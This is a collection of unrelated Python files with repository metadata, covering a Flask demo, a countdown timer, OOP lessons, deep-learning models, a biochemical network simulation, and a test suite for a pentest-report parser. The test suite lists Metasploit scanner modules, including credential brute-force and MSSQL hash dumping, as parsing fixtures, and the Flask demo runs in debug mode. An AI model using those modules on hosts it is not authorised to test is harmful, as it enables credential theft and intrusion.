from flask import Flask, render_template, request import mymodule app = Flask(__name__) app.debug = True @app.route("/") def index(): name="Aleksander" return render_template('index.html',name=name) #retunrs all data @app.route("/data/") def alldata(): return mymodule.process() #an example of 1 paramter pass @app.route("/data/date=<date>") def data(date=0): return str(date) #return mymodule.process() #an example of x paramter pass @app.route("/datapost", methods=['GET','POST']) def datapost(): arguemtns = request.get_json() return "DATA:" if __name__ == "__main__": app.run()
[ "aleksander.fabijan@me.com" ]
aleksander.fabijan@me.com
c86e24d69cca136581dc75c9b380027f59bfa8d9
9b82603adcd8f5ffa9cc9a89b1cc5626ae0c671d
/pan5.py
be25fcb069f2b94db60e56db9513304f6515f444
[]
no_license
googlelxhgithub/testgit
101c2511610d5db9c1e83536c4098984b5624d3a
d371d0e7e03c4b6276e5af245f9b0ffbdb0f4d90
refs/heads/master
2023-08-17T08:14:08.780942
2021-09-27T23:04:38
2021-09-27T23:04:38
283,491,195
0
0
null
null
null
null
UTF-8
Python
false
false
1,072
py
# “倒计时”在我们日常生活中随处可见, # 比如:交通标志、开工仪式、庆祝活动、 火箭升空。 # 但最戏剧化的还是电影 007 中定时炸弹的倒计时,还有《三体》中的倒计时信号。 # 今天的问题是:输入一个目标时间(包括年、月、日、时、分、秒), # 如何写出从当前时间开始到目标时间的倒计时? from datetime import datetime import os import time DDay = input("目标日期(格式:YY/MM/DD HH:MM:SS) ") # 把输入的日期打印出来,此时是字符形式。 print(DDay) # 把字符形式转化为日期格式 DDay = datetime.strptime(DDay, "%Y/%m/%d %H:%M:%S") while True: os.system('cls') NDay = datetime.now() # print(DDay, NDay) D = DDay - NDay DD = D.days secs = D.seconds HH = secs // 3600 secs = secs % 3600 MM = secs // 60 secs = secs % 60 print(f"{DD}天{HH}时{MM}分{secs}秒") time.sleep(1) # cday = datetime.strptime("2017-8-1 18:20:20", "%Y-%m-%d %H:%M:%S") # print(cday) # print(cday.day)
[ "googlelxh@foxmail.com" ]
googlelxh@foxmail.com
5e53ab4f41caab7253868ca8b0b46d897ca04b95
a6588f6e38e90286549851bf38c76339d98d5d1e
/PythonOOP/basic07.py
248f5c9337e90b6db4f73aaac06cbaa3a4734f62
[]
no_license
Kamonphet/BasicPython
6c5213d7ec265e000370bb6b13eea8c2a84825ee
aa99bcbf0cf69dd61d7495a6e5f9ba608814a8cb
refs/heads/main
2023-07-24T00:35:01.916593
2021-09-09T13:23:06
2021-09-09T13:23:06
403,143,794
0
0
null
null
null
null
UTF-8
Python
false
false
2,479
py
# Inheritance การสืบทอดคุณสมบัติ => การสร้างสิ่งใหม่ขึ้นด้วยการสืบทอดหรือรับเอา # คุณสมบัติบางอย่างมากจากสิ่งเดิมที่มีอยู่แล้วโดยการสร้างเพิ่มเิมจากสิ่งที่มีอยู่แล้ว # แบ่งเป็น superclass และ subclass # superclass # super() => เรียกใช้งานคุณสมบัติในsuperclass # class Employee: class Employee: #class variable _minSalary = 12000 _maxSalary = 50000 def __init__(self,name,salary,department): # instance variable self._name = name #protected self.__salary = salary self.__department = department # protected medthod def _showdata(self): print("complete attribute") print("name = {}".format(self._name)) print("salary = ",self.__salary) print("Department = ",self.__department) def _getIncome(self) : return self.__salary*12 #แปลง obj เป็น str def __str__(self) : return ("EmployeeName = {} , Department = {} , SalaryPerYear = {}".format(self._name,self.__department,self._getIncome())) # subclass # class name(Employee): class Accounting(Employee): __departmentName = "แผนกบัญชี" def __init__(self,name,salary): super().__init__(name,salary,self.__departmentName) class Programmer(Employee): __departmentName = "แผนกพัฒนาระบบ" def __init__(self,name,salary): super().__init__(name,salary,self.__departmentName) # super()._showdata() class sale(Employee): __departmentName = "แผนกขาย" def __init__(self,name,salary): super().__init__(name,salary,self.__departmentName) # สร้างวัตถุ obj1 = Employee("phet",50000,"Teacher") obj2 = Employee("Flim",100000,"Bussines") obj3 = Employee("Family",150000,"House") account = Accounting('phet',40000) programmer = Programmer('flim',60000) Sale = sale('love',1000) #เรียกใช้ # print(Employee._maxSalary) # print(account._minSalary) # account._showdata() # print("Income = {}".format(account._getIncome())) # print(account.__str__())
[ "noreply@github.com" ]
noreply@github.com
4ba29b5b0658607d45ec4cddc703e57f647803a2
ee81efa621f8a18569d8ac00e5176aff1a736d86
/kornislav.py
37758a2ea9cf0c8c91688ee2dd1fcffcb9de4eeb
[]
no_license
renaldyresa/Kattis
c8b29f40a84f4161f49c6247abf10ec2ecc14810
e504f54602b054eeffaac48b43e70beb976ca94c
refs/heads/master
2021-12-01T14:57:57.614911
2021-11-29T07:44:43
2021-11-29T07:44:43
182,920,692
1
0
null
null
null
null
UTF-8
Python
false
false
74
py
data = list(map(int, input().split())) data.sort() print(data[0]*data[2])
[ "noreply@github.com" ]
noreply@github.com
6a12d1accfa480e4b12e2edf24372e30ecff77b8
7775d1f4db482114f734645f23a64fef1ef7e724
/model/ESTRNN.py
7ac59c92438ab761b5fd37a87b2257adbba998d8
[ "MIT" ]
permissive
RunqiuBao/Event_ESTRNN
f325820413cfc938cec420a7c88123b605e9e1e7
6d156cc42a3a33bd0b4b7c4c4be98f943ff53acb
refs/heads/master
2023-06-16T20:21:04.992942
2021-07-11T02:26:12
2021-07-11T02:26:12
360,787,970
0
0
null
null
null
null
UTF-8
Python
false
false
8,918
py
import torch import torch.nn as nn import torch.nn.functional as F from thop import profile from .arches import conv1x1, conv3x3, conv5x5, actFunc # Dense layer class dense_layer(nn.Module): def __init__(self, in_channels, growthRate, activation='relu'): super(dense_layer, self).__init__() self.conv = conv3x3(in_channels, growthRate) self.act = actFunc(activation) def forward(self, x): out = self.act(self.conv(x)) out = torch.cat((x, out), 1) return out # Residual dense block class RDB(nn.Module): def __init__(self, in_channels, growthRate, num_layer, activation='relu'): super(RDB, self).__init__() in_channels_ = in_channels modules = [] for i in range(num_layer): modules.append(dense_layer(in_channels_, growthRate, activation)) in_channels_ += growthRate self.dense_layers = nn.Sequential(*modules) self.conv1x1 = conv1x1(in_channels_, in_channels) def forward(self, x): out = self.dense_layers(x) out = self.conv1x1(out) out += x return out # Middle network of residual dense blocks class RDNet(nn.Module): def __init__(self, in_channels, growthRate, num_layer, num_blocks, activation='relu'): super(RDNet, self).__init__() self.num_blocks = num_blocks self.RDBs = nn.ModuleList() for i in range(num_blocks): self.RDBs.append(RDB(in_channels, growthRate, num_layer, activation)) self.conv1x1 = conv1x1(num_blocks * in_channels, in_channels) self.conv3x3 = conv3x3(in_channels, in_channels) def forward(self, x): out = [] h = x for i in range(self.num_blocks): h = self.RDBs[i](h) out.append(h) out = torch.cat(out, dim=1) out = self.conv1x1(out) out = self.conv3x3(out) return out # DownSampling module class RDB_DS(nn.Module): def __init__(self, in_channels, growthRate, num_layer, activation='relu'): super(RDB_DS, self).__init__() self.rdb = RDB(in_channels, growthRate, num_layer, activation) self.down_sampling = conv5x5(in_channels, 2 * in_channels, stride=2) def forward(self, x): # x: n,c,h,w x = self.rdb(x) out = self.down_sampling(x) return out # Global spatio-temporal 
attention module class GSA(nn.Module): def __init__(self, para): super(GSA, self).__init__() self.n_feats = para.n_features self.center = para.past_frames self.num_ff = para.future_frames self.num_fb = para.past_frames self.related_f = self.num_ff + 1 + self.num_fb self.F_f = nn.Sequential( nn.Linear(2 * (5 * self.n_feats), 4 * (5 * self.n_feats)), actFunc(para.activation), nn.Linear(4 * (5 * self.n_feats), 2 * (5 * self.n_feats)), nn.Sigmoid() ) # out channel: 160 self.F_p = nn.Sequential( conv1x1(2 * (5 * self.n_feats), 4 * (5 * self.n_feats)), conv1x1(4 * (5 * self.n_feats), 2 * (5 * self.n_feats)) ) # condense layer self.condense = conv1x1(2 * (5 * self.n_feats), 5 * self.n_feats) # fusion layer self.fusion = conv1x1(self.related_f * (5 * self.n_feats), self.related_f * (5 * self.n_feats)) def forward(self, hs): # hs: [(n=4,c=80,h=64,w=64), ..., (n,c,h,w)] self.nframes = len(hs) f_ref = hs[self.center] cor_l = [] for i in range(self.nframes): if i != self.center: cor = torch.cat([f_ref, hs[i]], dim=1) w = F.adaptive_avg_pool2d(cor, (1, 1)).squeeze() # (n,c) : (4, 160) if len(w.shape) == 1: w = w.unsqueeze(dim=0) w = self.F_f(w) w = w.reshape(*w.shape, 1, 1) cor = self.F_p(cor) cor = self.condense(w * cor) cor_l.append(cor) cor_l.append(f_ref) out = self.fusion(torch.cat(cor_l, dim=1)) return out # RDB-based RNN cell class RDBCell(nn.Module): def __init__(self, para): super(RDBCell, self).__init__() self.activation = para.activation self.n_feats = para.n_features self.n_blocks = para.n_blocks self.F_B0 = conv5x5(3, self.n_feats, stride=1) self.F_B1 = RDB_DS(in_channels=self.n_feats, growthRate=self.n_feats, num_layer=3, activation=self.activation) self.F_B2 = RDB_DS(in_channels=2 * self.n_feats, growthRate=int(self.n_feats * 3 / 2), num_layer=3, activation=self.activation) self.F_R = RDNet(in_channels=(1 + 4) * self.n_feats, growthRate=2 * self.n_feats, num_layer=3, num_blocks=self.n_blocks, activation=self.activation) # in: 80 # F_h: hidden state part self.F_h 
= nn.Sequential( conv3x3((1 + 4) * self.n_feats, self.n_feats), RDB(in_channels=self.n_feats, growthRate=self.n_feats, num_layer=3, activation=self.activation), conv3x3(self.n_feats, self.n_feats) ) def forward(self, x, s_last): out = self.F_B0(x) out = self.F_B1(out) out = self.F_B2(out) out = torch.cat([out, s_last], dim=1) out = self.F_R(out) s = self.F_h(out) return out, s # Reconstructor class Reconstructor(nn.Module): def __init__(self, para): super(Reconstructor, self).__init__() self.para = para self.num_ff = para.future_frames self.num_fb = para.past_frames self.related_f = self.num_ff + 1 + self.num_fb self.n_feats = para.n_features self.model = nn.Sequential( nn.ConvTranspose2d((5 * self.n_feats) * (self.related_f), 2 * self.n_feats, kernel_size=3, stride=2, padding=1, output_padding=1), nn.ConvTranspose2d(2 * self.n_feats, self.n_feats, kernel_size=3, stride=2, padding=1, output_padding=1), conv5x5(self.n_feats, 3, stride=1) ) def forward(self, x): return self.model(x) class Model(nn.Module): """ Efficient saptio-temporal recurrent neural network (ESTRNN, ECCV2020) """ def __init__(self, para): super(Model, self).__init__() self.para = para self.n_feats = para.n_features self.num_ff = para.future_frames self.num_fb = para.past_frames self.ds_ratio = 4 self.device = torch.device('cuda') self.cell = RDBCell(para) self.recons = Reconstructor(para) self.fusion = GSA(para) def forward(self, x, profile_flag=False): if profile_flag: return self.profile_forward(x) outputs, hs = [], [] batch_size, frames, channels, height, width = x.shape s_height = int(height / self.ds_ratio) s_width = int(width / self.ds_ratio) # forward h structure: (batch_size, channel, height, width) s = torch.zeros(batch_size, self.n_feats, s_height, s_width).to(self.device) for i in range(frames): h, s = self.cell(x[:, i, :, :, :], s) hs.append(h) for i in range(self.num_fb, frames - self.num_ff): out = self.fusion(hs[i - self.num_fb:i + self.num_ff + 1]) out = self.recons(out) 
outputs.append(out.unsqueeze(dim=1)) return torch.cat(outputs, dim=1) # For calculating GMACs def profile_forward(self, x): outputs, hs = [], [] batch_size, frames, channels, height, width = x.shape s_height = int(height / self.ds_ratio) s_width = int(width / self.ds_ratio) s = torch.zeros(batch_size, self.n_feats, s_height, s_width).to(self.device) for i in range(frames): h, s = self.cell(x[:, i, :, :, :], s) hs.append(h) for i in range(self.num_fb + self.num_ff): hs.append(torch.randn(*h.shape).to(self.device)) for i in range(self.num_fb, frames + self.num_fb): out = self.fusion(hs[i - self.num_fb:i + self.num_ff + 1]) out = self.recons(out) outputs.append(out.unsqueeze(dim=1)) return torch.cat(outputs, dim=1) def feed(model, iter_samples): inputs = iter_samples[0] outputs = model(inputs) return outputs def cost_profile(model, H, W, seq_length): x = torch.randn(1, seq_length, 3, H, W).cuda() profile_flag = True flops, params = profile(model, inputs=(x, profile_flag), verbose=False) return flops / seq_length, params
[ "zzh.tech@gmail.com" ]
zzh.tech@gmail.com
bf020a5eba52f22d341b35e48d8b8451ab99b48b
977724d5e811c5b54963908022752e3e3517d30e
/main.py
abc855110c8863f56aa8d3ef9792b6d1d220de75
[]
no_license
naem1023/CNN_DS
5f7ec702a3aebbf0866f73eb3995825a0ca7b528
5a686efa3858346339d5d6c5c0cb930a8fc498a3
refs/heads/master
2023-03-28T11:24:05.523790
2021-04-01T10:20:31
2021-04-01T10:20:31
322,156,987
0
0
null
null
null
null
UTF-8
Python
false
false
10,585
py
import read_train_file import model import numpy as np import matplotlib.pyplot as plt import os import cv2 import pandas as pd import time from multiprocessing import Process, Lock, Queue, Pool import multiprocessing from tqdm import tqdm from tqdm import trange import tensorflow as tf from tensorflow.keras.models import Sequential, load_model from tensorflow.keras.layers import Input, Conv2D, MaxPooling2D, Dense, Flatten, Dropout, BatchNormalization, Activation, ZeroPadding2D, GlobalAveragePooling2D from keras.utils import to_categorical from tensorflow.keras import initializers from sklearn.model_selection import StratifiedShuffleSplit import platform def plot_loss_curve(history): import matplotlib.pyplot as plt plt.figure(figsize=(15, 10)) plt.plot(history['loss']) plt.plot(history['val_loss']) plt.title('model loss') plt.ylabel('loss') plt.xlabel('epoch') plt.legend(['train', 'test'], loc='upper right') plt.show() def train_model(X_train, X_test, y_train, y_test, model): X_train = X_train.reshape(X_train.shape[0], 300, 300, 3) X_test = X_test.reshape(X_test.shape[0], 300, 300, 3) print("X_train.shape=", X_train.shape) print("y_train.shape", y_train.shape) print("X_test.shape=", X_test.shape) print("y_test.shape", y_test.shape) # print(y_train[0]) ''' softmax layer -> output=10개의 노드. 각각이 0부터 9까지 숫자를 대표하는 클래스 이를 위해서 y값을 one-hot encoding 표현법으로 변환 0: 1,0,0,0,0,0,0,0,0,0 1: 0,1,0,0,0,0,0,0,0,0 ... 
5: 0,0,0,0,0,1,0,0,0,0 ''' # reformat via one-hot encoding y_train = to_categorical(y_train) y_test = to_categorical(y_test) # print(y_train[0]) # catergorical_crossentropy = using when multi classficiation # metrics = output data type model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) # batch_size : see batch_size data and set delta in gradient decsending history = model.fit(X_train, y_train, validation_data=(X_test, y_test), batch_size=16, epochs=30, verbose=1) plot_loss_curve(history.history) # print(history.history) print("train loss=", history.history['loss'][-1]) print("validation loss=", history.history['val_loss'][-1]) # save model in file # offering in KERAS model.save('model-201611263.model') history_df = pd.DataFrame(history.history) with open("history_data.csv", mode='w') as file: history_df.to_csv(file) return model def get_class_name(n): if n == 0: return "food" elif n == 1: return "interior" elif n == 2: return "exterior" def predict_image_sample(model, X_test, y_test, n): from random import randrange correct_count = 0; wrong_count = 0 for idx in range(n): if correct_count == 2 and wrong_count == 2: break test_sample_id = randrange(len(X_test)) test_image = X_test[test_sample_id] test_image = test_image.reshape(1, 300, 300, 3) # get answer y_actual = y_test[test_sample_id] # get prediction list y_pred = model.predict(test_image) # get prediction y_pred = np.argmax(y_pred, axis=1) # true, prediction is right if y_pred == y_actual and correct_count <= 2: plt.imshow(test_image[0]) plt.show() print("==right prediction==") print("y_actual number=", y_actual) print("y_actual class=", get_class_name(y_actual)) # 3 dimensiong print("y_pred number=", y_pred) print("y_pred number=", get_class_name(y_pred)) print() correct_count += 1 elif y_pred != y_actual and wrong_count <= 2: plt.imshow(test_image[0]) plt.show() print("==wrong prediction==") print("y_actual number=", y_actual) print("y_actual class=", 
get_class_name(y_actual)) # 3 dimensiong print("y_pred number=", y_pred) print("y_pred number=", get_class_name(y_pred)) print() wrong_count += 1 ''' if y_pred != y_actual: print("sample %d is wrong!" %test_sample_id) with open("wrong_samples.txt", "a") as errfile: print("%d"%test_sample_id, file=errfile) else: print("sample %d is correct!" %test_sample_id) ''' def shuffle_and_valdiate(X, y): print("start split and shuffle!") shuffle_split = StratifiedShuffleSplit(train_size=0.7, test_size=0.3, n_splits=1, random_state=0) for train_idx, test_idx in tqdm(shuffle_split.split(X, y)): X_train, X_test = X[train_idx], X[test_idx] y_train, y_test = y[train_idx], y[test_idx] # X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, shuffle=True, random_state=42) print(X_train.shape) print(X_test.shape) return X_train, X_test, y_train, y_test def get_image(): image_dir = 'images' file_number = len(os.listdir(os.path.join(image_dir))) print(file_number) # np.zeros((300, 300, 3)) # X = np.zeros((file_number, 300, 300, 3), dtype=int) # # # y = np.zeros((file_number), dtype=int) X = list() y = list() for image_name in tqdm(os.listdir(os.path.join(image_dir))): image = cv2.imread(os.path.join(image_dir, image_name)) if image_name[:4] == "food": y.append(0) # y[idx] = 0 elif image_name[:8] == 'interior' : y.append(1) # y[idx] = 1 elif image_name[:8] == 'exterior': y.append(2) # y[idx] = 2 X.append(image) # X[idx] = image start_time = time.time() print("read complete") X = np.array(X) y = np.array(y) end_time = time.time() print("convert image to numpy time = ", end_time - start_time) print("converting complete") print(X.shape) print(y.shape) start_time = time.time() X_train, X_test, y_train, y_test = shuffle_and_valdiate(X, y) end_time = time.time() print("shuffle image time = ", end_time - start_time) # read_train_file.write_data(X_train, X_test, y_train, y_test) return X_train, X_test, y_train, y_test def make_common_model(): model = Sequential([ 
Input(shape=(300, 300, 3), name='input_layer'), # size of parameter = n_filters * (filter_size + 1) = 32*(9+1) = 320 # using 32 filter # filter size is 3 Conv2D(64, kernel_size=(1, 1)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Conv2D(32, kernel_size=(3, 3)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Conv2D(64, kernel_size=(1, 1)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Conv2D(32, kernel_size=(3, 3)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Conv2D(64, kernel_size=(1, 1)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Conv2D(32, kernel_size=(3, 3)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Flatten(), Dense(24, activation='relu'), Dropout(0.5), Dense(3, activation='softmax', name='output_layer') ]) model.summary() return model def make_resnet_model(): model = Sequential() model.add(Input(shape=(300, 300, 3), name='input_layer'),) model.add(ZeroPadding2D(padding=(3,3))) model.add(Conv2D(32, (10, 10), strides=2, kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) model.add(ZeroPadding2D(padding=(1, 1))) model.add(MaxPooling2D((2, 2), strides=1, padding='same')) model.add(Conv2D(32, (1, 1), strides=1, padding='valid', kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) model.add(Conv2D(32, (3, 3), strides=1, padding='same', kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) # model.add(MaxPooling2D((2, 2), strides=1, padding='same')) model.add(Conv2D(32, (1, 1), strides=2, padding='valid', kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) model.add(Conv2D(32, (3, 3), strides=1, padding='same', kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) model.add(Conv2D(32, 
(3, 3), strides=1, padding='valid', kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) # model.add(MaxPooling2D((2, 2), strides=1, padding='same')) # model.add(Conv2D(8, (1, 1), strides=1, padding='same', activation='relu', kernel_initializer='he_normal')) # model.add(Flatten()) # model.add(Dense(8, activation='relu')) # model.add(Dropout(0.5)) model.add(GlobalAveragePooling2D()) model.add(Dense(3, activation='softmax', name='output_layer')) model.summary() return model if __name__ == '__main__': print(platform.architecture()[0]) # import mnist # # mnist.train_mnist() all_start_time = time.time() start_time = time.time() # set tensorflow config = tf.compat.v1.ConfigProto() config.gpu_options.allow_growth = True session = tf.compat.v1.Session(config=config) tf.compat.v1.keras.backend.set_session(session) # model = make_resnet_model() model = model.model_resnet() # model = make_common_model() # get train and test data X_train, X_test, y_train, y_test = get_image() print("Get all image") end_time = time.time() print("read image time = ", end_time - start_time) # X_train, X_test, y_train, y_test = read_train_file.read_data() # print("Read all image") # start_time = time.time() model = train_model(X_train, X_test, y_train, y_test, model) model = load_model('model-201611263.model') predict_image_sample(model, X_test, y_test, 500) end_time = time.time() all_end_time = time.time() print("train elapsed time = ", end_time - start_time) print("all elapsed time = ", all_end_time - all_start_time)
[ "relilau00@gmail.com" ]
relilau00@gmail.com
610f110f48d5d27f54a0bc5be7c5258c9bb94d12
ddddc401695a23f595e42e25abfb16baa3da82ba
/educode/apps.py
bda8e94ca6e930c4de9057d5acc31779b253fc79
[ "BSD-3-Clause" ]
permissive
harshavardhan26082001/MovieApp
bf6a60dd03b0101ec7d0104414270bec610fff04
cc0e9b743b3f73322af93997901c3c24265ec870
refs/heads/main
2023-05-07T19:03:53.862739
2021-05-27T05:52:42
2021-05-27T05:52:42
370,947,037
1
0
null
null
null
null
UTF-8
Python
false
false
146
py
from django.apps import AppConfig class EducodeConfig(AppConfig): default_auto_field = 'django.db.models.BigAutoField' name = 'educode'
[ "harsha26082001@gmail.com" ]
harsha26082001@gmail.com
587c4dfea6b066d51ee614baaa03ef70152816ab
6fdb4a1a7ecb68dcddce8b03cb325578aaef3b33
/2013-02-02/home/atm.py
d7b8635cc00d58365fe6db7df244a1ab52bd9edc
[]
no_license
lowrey/checkio
19e62bf9383bb21a069bc782a99bbe0e2dcf09d2
be0090a4d444648b2295ee088bce0c0e2b4e190d
refs/heads/master
2021-01-23T12:05:17.214951
2014-06-09T03:34:50
2014-06-09T03:34:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,183
py
# Withdraw without any incident # 120 - 10 - 0.5 - 1% = floor(109.4) = 109 # 109 - 20 - 0.5 - 1% = floor(88.3) = 88 # 88 - 30 - 0.5 - 1% = floor(57.2) = 57 def withdraw(balance, amount): result = balance - amount one_percent = .01 * amount result -= (.5 + one_percent) return int(result) def check_amount(amount): if amount < 0: return False if (amount % 5) != 0: return False return True def checkio(data): balance, withdrawal = data for amount in withdrawal: if check_amount(amount): temp_balance = withdraw(balance, amount) if temp_balance >= 0: balance = temp_balance print balance return balance if __name__ == '__main__': assert checkio([120, [10 , 20, 30]]) == 57, 'First' # With one Insufficient Funds, and then withdraw 10 $ assert checkio([120, [200 , 10]]) == 109, 'Second' #with one incorrect amount assert checkio([120, [3, 10]]) == 109, 'Third' assert checkio([120, [200, 119]]) == 120 , 'Fourth' assert checkio([120, [120, 10, 122, 2, 10, 10, 30, 1]]) == 56, "It's mixed all base tests" print 'All Ok'
[ "lowrey@server.fake" ]
lowrey@server.fake
d71cabbf96f5623e576964651f4821ca2a0f0d60
89ed212f9fc3554b70e8785d7230d0835f47e68d
/unorganized_code/kp_single_molecule.py
c8a3a7bd60c98d8a195232e346fecf043f5f6d16
[ "MIT" ]
permissive
rganti/Channel_Capacity_T_Cell
b2499fe62631aae9e4fdd7cd2d0382fb1180ed33
62b9cba7a4248287598d06c010dcfcc4601a7006
refs/heads/master
2023-03-29T15:10:36.609260
2021-04-01T16:18:43
2021-04-01T16:18:43
275,271,929
2
1
null
null
null
null
UTF-8
Python
false
false
4,800
py
import argparse from realistic_network import TcrCycleSelfWithForeign, KPRealistic, make_and_cd from simulation_parameters import MembraneBindingParameters from ssc_tcr_membrane import MembraneSharedCommands class SingleMoleculeKprLs(TcrCycleSelfWithForeign): def __init__(self, arguments=None): TcrCycleSelfWithForeign.__init__(self, arguments=arguments) self.rate_constants = MembraneBindingParameters() del self.n_initial['Lf'] del self.n_initial['Ls'] self.record = [] self.output = [] self.diffusion_flag = True def change_ligand_concentration(self, concentration): for i in range(concentration): name = "Ls{0}".format(i + 1) self.n_initial[name] = 1 # self.record.append(name) self.output.append(name) self.k_L_off[name] = self.rate_constants.k_self_off class SingleMoleculeKprLsLf(SingleMoleculeKprLs): def __init__(self, arguments=None): SingleMoleculeKprLs.__init__(self, arguments=arguments) self.lf = 3 for i in range(self.lf): name = "Lf{0}".format(i + 1) self.n_initial[name] = 1 # self.record.append(name) self.output.append(name) self.k_L_off[name] = self.rate_constants.k_foreign_off class KPRealisticSingleMolecule(KPRealistic): def __init__(self, self_foreign=False, arguments=None): KPRealistic.__init__(self, self_foreign=self_foreign, arguments=arguments) if self.self_foreign_flag: self.ligand = SingleMoleculeKprLsLf(arguments=arguments) else: self.ligand = SingleMoleculeKprLs(arguments=arguments) self.single_molecule = True def define_diffusion(self, f): for key in self.ligand.diffusion_rate_dict.keys(): if self.ligand.diffusion_loc_dict[key] == "Plasma": f.write("diffusion {0} at {1} in {2}\n".format(key, self.ligand.diffusion_rate_dict[key], self.ligand.diffusion_loc_dict[key])) else: f.write( "diffusion {0} at {1} in {2}, Cytosol<->Plasma\n".format(key, self.ligand.diffusion_rate_dict[key], self.ligand.diffusion_loc_dict[key])) def generate_ssc_script(self, simulation_name): script_name = simulation_name + ".rxn" shared = 
MembraneSharedCommands(self.ligand.n_initial, self.ligand.record, self.ligand.diffusion_loc_dict) f = open(script_name, "w") n = open("ordered_network", "w") self.regions.define_membrane_region(f) f.write("-- Forward reactions \n") n.write("# Forward Reactions \n") self.define_reactions(f, self.ligand.forward_rxns, self.ligand.forward_rates, n) n.write("\n# Reverse Reactions \n") f.write("\n-- Reverse reactions \n") self.define_reactions(f, self.ligand.reverse_rxns, self.ligand.reverse_rates, n) f.write("\n") if self.ligand.diffusion_flag: f.write("\n-- Diffusion \n") self.define_diffusion(f) f.write("\n") shared.initialize(f) f.write("\n") shared.record_species(f) n.close() f.close() if __name__ == "__main__": parser = argparse.ArgumentParser(description="Submitting job for single step KPR", formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--run', action='store_true', default=False, help='Flag for submitting simulations.') parser.add_argument('--ss', action='store_true', default=False, help="flag for checking if sims approach steady-state.") parser.add_argument('--steps', dest='steps', action='store', type=int, default=0, help="number of KP steps.") parser.add_argument('--ls', action='store_true', default=False, help="flag for submitting Ls calculations.") parser.add_argument('--ls_lf', dest='ls_lf', action='store', type=int, default=3, help="number of foreign ligands.") args = parser.parse_args() directory_name = "{0}_step".format(args.steps) make_and_cd(directory_name) if args.ls: sub_directory = "Ls" make_and_cd(sub_directory) kp = KPRealisticSingleMolecule(arguments=args) elif args.ls_lf: sub_directory = "Ls_Lf" # make_and_cd(sub_directory) kp = KPRealisticSingleMolecule(self_foreign=True, arguments=args) else: raise Exception("Need to specify Ls or Ls_Lf") kp.main_script(run=args.run)
[ "rg468@cam.ac.uk" ]
rg468@cam.ac.uk
b30f5537526f3f947a1bf63a0c422307f10c78e4
8b495f11fe76002342304092bd04338dcdee2378
/tests/metasploit/test.py
6e78227fc7040098fcb7e69447004d7b61e0a6b4
[ "BSD-3-Clause" ]
permissive
cacalote/ptp
bd88c6ba253f4fb8d4a339730cda41f7b29ade39
720e9f8b33a15eb9ff88f858a68c99f30e37982e
refs/heads/master
2020-09-15T13:29:49.671521
2015-05-20T15:41:02
2015-05-20T15:41:02
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,644
py
from __future__ import print_function import os import traceback from ptp import PTP from ptp.libptp.constants import UNKNOWN, INFO, LOW, MEDIUM, HIGH __testname__ = 'metasploit' REPORTS = { # Scanner 'auxiliary/scanner/ftp/anonymous': { 'report_low.txt': LOW, 'report_high.txt': HIGH, }, 'auxiliary/scanner/ftp/ftp_version': { 'report_info.txt': INFO, 'report_info2.txt': INFO, }, 'auxiliary/scanner/ftp/ftp_login': { 'report_low.txt': LOW, 'report_high.txt': HIGH, }, 'auxiliary/scanner/smtp/smtp_enum': { 'report_low.txt': LOW, 'report_low2.txt': LOW, }, 'auxiliary/scanner/vnc/vnc_login': { 'report_high.txt': HIGH, 'report_high2.txt': HIGH, }, 'auxiliary/scanner/vnc/vnc_none_auth': { 'report_high.txt': HIGH, }, 'auxiliary/scanner/x11/open_x11': { 'report_high.txt': HIGH, 'report_high2.txt': HIGH, }, # TODO: Add report examples for EMC AlphaStor. 'auxiliary/scanner/mssql/mssql_ping': { 'report_info.txt': INFO, 'report_info2.txt': INFO, 'report_info3.txt': INFO, }, 'auxiliary/scanner/mssql/mssql_login': { 'report_high.txt': HIGH, 'report_high2.txt': HIGH, }, 'auxiliary/scanner/mssql/mssql_hashdump': { 'report_high.txt': HIGH, }, # TODO: Add report examples for MSSQL Schema dump. # TODO: Add report examples for DCERPC endpoint mapper. # TODO: Add report examples for DCERPC hidden. 'auxiliary/scanner/smb/smb_version': { 'report_info.txt': INFO, 'report_info2.txt': INFO, 'report_info3.txt': INFO, }, 'auxiliary/scanner/smb/pipe_auditor': { 'report_info.txt': INFO, 'report_info2.txt': INFO, }, 'auxiliary/scanner/smb/smb_enumusers': { 'report_info.txt': INFO, 'report_info2.txt': INFO, 'report_info3.txt': INFO, }, 'auxiliary/scanner/smb/smb_login': { 'report_high.txt': HIGH, 'report_high2.txt': HIGH, 'report_unknown.txt': UNKNOWN, }, 'auxiliary/scanner/snmp/snmp_enumusers': { 'report_low.txt': LOW, }, # FIXME: Fix the snmp_enumshares signature. #'auxiliary/scanner/snmp/snmp_enumshares': { # 'report_low.txt': LOW, #}, # TODO: Add report examples for SNMP enums. 
# TODO: Add report examples for SNMP AIX version. 'auxiliary/scanner/snmp/snmp_login': { 'report_low.txt': LOW, 'report_high.txt': HIGH, 'report_high2.txt': HIGH, } } def run(): try: reports = REPORTS.iteritems() except AttributeError: # Python3 reports = REPORTS.items() for plugin, outputs in reports: print('\t> %s' % plugin) for output in outputs: ptp = PTP('metasploit') print('\t\ttest parse():', end=' ') res = 'OK' try: ptp.parse( pathname=os.path.join( os.getcwd(), 'tests/metasploit/', plugin), filename=output, plugin=plugin) except Exception: print(traceback.format_exc()) res = 'FAIL' print(res) print('\t\ttest get_highest_ranking():', end=' ') res = 'OK' try: assert ptp.get_highest_ranking() == outputs[output] except Exception: print(traceback.format_exc()) res = 'FAIL' print(res)
[ "sauvage.tao@gmail.com" ]
sauvage.tao@gmail.com
55f4a31aab12f7a1297431badf330562a268656e
